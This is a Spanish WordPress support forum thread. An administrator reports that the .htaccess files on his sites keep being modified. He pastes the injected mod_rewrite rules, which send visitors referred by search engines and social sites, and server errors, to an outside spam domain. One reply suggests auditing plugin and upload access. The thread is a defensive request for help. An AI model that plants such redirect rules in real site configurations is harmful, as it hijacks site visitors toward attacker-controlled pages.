Soporte » Plugins y Hacks » Hacks » Modifican el .htaccess

  • Buenas tardes, necesito de su ayuda… soy administrador de varios sitios web en los cuales tengo configurado el maravilloso WordPress, pero desde hace algunos meses he notado que en algunos de los website se modifica el .htacces tanto en el /home del Cpanel, como en el /public_html y tambien en la carpeta donde se ubica el WordPress.

    Esto es lo que encuentro…

    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|youtube|wikipedia|excite|altavista|msn|netscape|aol|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|linkedin|flickr|liveinternet|filesearch|yell|openstat|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv|infospace)\.(.*)
    RewriteRule ^(.*)$ http://mysupas.ru/blackmuscats?5 [R=301,L]
    RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*) RewriteRule ^(.*)$ http://mysupas.ru/blackmuscats?5 [R=301,L] </IfModule> ErrorDocument 500 http://mysupas.ru/blackmuscats?5

    La pregunta es… que puedo hacer para efectivamente proteger mis sitios web y evitar que se modifique el .htaccess

    quedo pendiente a sus comentarios

Viendo 1 respuesta (de un total de 1)
  • tzkmx

    (@tzkmx)

    Primero, busca que personas que no lo requieran, no tengan acceso de edición a los plugins, podrían estar subiendo plugins que tengan fallos de seguridad.

    Por otra parte, si estás corriendo varios sitios en un mismo hosting compartido, debes auditar todos los usuarios que tienen acceso a subir archivos, parece que alguien, tal vez bienintencionado, te subió un archivo malicioso que está modificando tus .htaccess.

Viendo 1 respuesta (de un total de 1)
  • El debate ‘Modifican el .htaccess’ está cerrado a nuevas respuestas.